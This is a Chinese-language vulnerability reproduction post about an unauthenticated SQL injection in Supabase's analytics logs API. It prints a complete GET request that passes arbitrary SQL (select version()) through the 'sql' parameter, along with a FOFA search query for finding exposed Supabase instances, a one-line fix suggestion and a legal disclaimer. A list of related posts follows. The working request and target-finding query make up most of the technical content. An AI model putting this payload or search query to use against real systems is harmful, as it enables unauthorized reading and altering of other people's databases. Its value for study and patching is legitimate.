【复现】Supabase后端服务 SQL注入漏洞_48

目录

一.概述

[二 .漏洞影响](#二 .漏洞影响)

三.漏洞复现

[1. 漏洞一:](#1. 漏洞一:)

四.修复建议:

[五. 搜索语法:](#五. 搜索语法:)

六.免责声明


一.概述

Supabase是什么 Supabase将自己定位为Firebase的开源替代品,提供了一套工具来帮助开发者构建web或移动应用程序。 Supabase是建立在Postgres之上.

二 .漏洞影响

攻击者未经授权可以访问数据库中的数据,盗取用户的隐私以及个人信息,造成用户的信息泄露。 可以对数据库的数据进行增加或删除操作,例如私自添加或删除管理员账号。甚至拿到服务器权限。

三.漏洞复现

1. 漏洞一:

(1)漏洞类型: SQL注入

(2)请求类型:GET

(3)复现

找到相关系统


请求漏洞点,查看yakit响应


yakit请求包

java 复制代码
GET /api/projects/default/analytics/endpoints/logs.all?project=default&iso_timestamp_start=Z&sql=select+version() HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

四.修复建议:

对变量做好过滤和检测。

五. 搜索语法:

1.fofa

java 复制代码
title="supabase"

六.免责声明

本文所涉及的任何技术、信息或工具,仅供学习和参考之用。请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。

相关推荐
帅云毅29 分钟前
文件上传--解析漏洞和编辑器
笔记·学习·安全·web安全·编辑器·php
uwvwko32 分钟前
ctfhow——web入门214~218(时间盲注开始)
前端·数据库·mysql·ctf
樽酒ﻬق39 分钟前
深度解析 Kubernetes 配置管理:如何安全使用 ConfigMap 和 Secret
安全·贪心算法·kubernetes
柯34943 分钟前
Redis的过期删除策略和内存淘汰策略
数据库·redis·lfu·lru
Tiger_shl1 小时前
【Python语言基础】24、并发编程
java·数据库·python
0509151 小时前
测试基础笔记第十一天
java·数据库·笔记
A charmer1 小时前
【MySQL】数据库基础
数据库·mysql
云天徽上2 小时前
【数据可视化-27】全球网络安全威胁数据可视化分析(2015-2024)
人工智能·安全·web安全·机器学习·信息可视化·数据分析
pjx9872 小时前
应用的“体检”与“换装”:精通Spring Boot配置管理与Actuator监控
数据库·spring boot·oracle
网络之路Blog2 小时前
【实战中提升自己】内网安全部署之端口隔离与MAC地址认证
安全·macos·网络之路一天·华为华三数通基础·华为华三企业实战架构·华为中小型企业实战·华为华三计算机网络基础